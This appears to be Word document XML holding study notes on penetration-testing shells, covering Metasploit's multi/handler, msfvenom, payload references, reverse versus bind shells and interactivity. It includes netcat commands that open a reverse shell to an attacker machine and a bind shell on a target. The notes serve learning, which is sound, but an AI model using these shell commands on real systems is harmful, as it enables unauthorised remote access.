    <w:p w14:paraId="1AEE8C3A" w14:textId="3FE20182" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metasploit – multi/handler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60A733" w14:textId="42E8D7C5" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">The auxiliary/multi/handler </w:t>
      </w:r>
      <w:r w:rsidR="00C25D73" w:rsidRPr="0084205E">
        <w:t>module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA6D37" w14:textId="15B39852" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows obtainment of stable shells and further options available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E73890" w14:textId="1661AE97" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Only way to interact with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7387EF" w14:textId="16B63C24" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Handle staged payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682DFA0F" w14:textId="11FC8937" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17D7E9DF" w14:textId="6192096B" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>used to generate payloads on the fly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A803EF0" w14:textId="586D699F" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>commonly used to generate reverse and bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879EE65" w14:textId="0AD96E68" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Payload All </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D501D" w14:textId="46D56F0A" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Pentest Monkey Reverse Shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cheatsheet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0511BC36" w14:textId="00AE65F2" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D899D9A" w14:textId="03F6EDF5" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33138055" w14:textId="7A763FD8" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Types of Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C2B1F" w14:textId="10160A3C" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38934C88" w14:textId="48EBA114" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>target is forced to execute code that connects back to attacker computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F48D8" w14:textId="5B5E58F8" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>tools mentioned above can be used to set up listeners to receive connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88103D" w14:textId="70EF2AB3" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>helpful for bypassing firewall rules that usually prevent attackers from connecting to arbitrary ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2245F8C2" w14:textId="041C25EF" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>need to configure network to connect to the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E80376" w14:textId="3A96168C" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBD34D" w14:textId="002ACE28" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>code executed on the target is used to start a listener attached to a shell directly on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053386D0" w14:textId="3C5B7813" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>then opened to internet, meaning you can connect to the port that the code has opened and obtain RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A37DD" w14:textId="2A1FDAD3" w:rsidR="00C25D73" w:rsidRPr="0084205E" w:rsidRDefault="00C25D73" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>does not require network configuration</w:t>
      </w:r>
      <w:r w:rsidR="00657A71" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> but may be prevented by firewalls protecting the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A8C26" w14:textId="7EA25AB1" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse shells are easier to execute and debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E2C4A" w14:textId="26CDC37F" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>most common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1A27F" w14:textId="41C16473" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>especially for CTFs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333760C7" w14:textId="4F2BDE92" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">on attacker - sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port #&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15795A" w14:textId="4A88E474" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">on target – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;local-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B105B8" w14:textId="6B706451" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>listening on our own attacking machine and send a connection from the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C5698A" w14:textId="6934C6EC" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bind Shell example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0371C" w14:textId="420D4049" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">on the target – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port&gt; -e “cmd.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167FA07" w14:textId="4CC21922" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">on the attacker – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;machine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4B19D9" w14:textId="4A4002B6" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>listening on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4E473" w14:textId="1F036D6C" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Interactivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61899B1A" w14:textId="57804CDF" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>shells can either be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7011EF02" w14:textId="3DD29818" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321943A" w14:textId="41133469" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allow user to interact with programs after executing them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE6B73" w14:textId="77FC8419" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>interactive programs require interactive shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC51B0E" w14:textId="2D64B2C3" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AAA1A" w14:textId="1FEA2520" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">limited to using programs which do not require user interaction </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> run properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F07A0" w14:textId="73162DAD" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>majority of simple reverse and bind shells are noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E328D4" w14:textId="4D558DF0" w:rsidR="00657A71" w:rsidRPr="0084205E" w:rsidRDefault="00657A71" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>makes exploitation difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6633054E" w14:textId="25DC9AD4" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
